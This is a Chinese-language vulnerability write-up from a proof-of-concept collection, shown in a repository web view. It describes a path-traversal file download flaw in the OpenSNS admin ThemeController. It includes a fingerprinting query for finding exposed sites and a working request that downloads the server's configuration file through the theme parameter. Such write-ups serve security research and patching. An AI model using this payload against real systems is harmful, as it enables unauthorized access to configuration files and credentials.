admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-06 19:38:09 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/CMS漏洞/OpenSNS ThemeController.class.php 后台任意文件下载漏洞.md

41 lines
851 B
Markdown
Raw Normal View History

更新漏洞库:CMS漏洞/
2022-05-18 16:23:08 +08:00
# OpenSNS ThemeController.class.php 后台任意文件下载漏洞
## 漏洞描述
OpenSNS ThemeController.class.php文件中存在文件下载其中过滤不足导致可以下载服务器任意文件
## 漏洞影响
```
OpenSNS
```
更新漏洞
2023-08-28 15:55:36 +08:00
## 网络测绘
更新漏洞库:CMS漏洞/
2022-05-18 16:23:08 +08:00
```
icon_hash="1167011145"
```
## 漏洞复现
登录页面如下
更新漏洞
2022-12-05 11:09:28 +08:00
![image-20220518154815562](./images/202205181548621.png)
更新漏洞库:CMS漏洞/
2022-05-18 16:23:08 +08:00
存在漏洞的文件为 `Application/Admin/Model/ThemeController.class.php`
更新漏洞
2022-12-05 11:09:28 +08:00
![image-20220518154826306](./images/202205181548388.png)
更新漏洞库:CMS漏洞/
2022-05-18 16:23:08 +08:00
其中 theme参数为用户可控参数根据函数流程可以发现存在的文件将会打包为 zip文件提供下载
更新漏洞
2022-12-05 11:09:28 +08:00
![image-20220518154838931](./images/202205181548023.png)
更新漏洞库:CMS漏洞/
2022-05-18 16:23:08 +08:00
构造请求
```
POST /admin.php?s=/theme/packageDownload
theme=../Conf/common.php
```
更新漏洞
2022-12-05 11:09:28 +08:00
![image-20220518154851785](./images/202205181548889.png)
Reference in New Issue Copy Permalink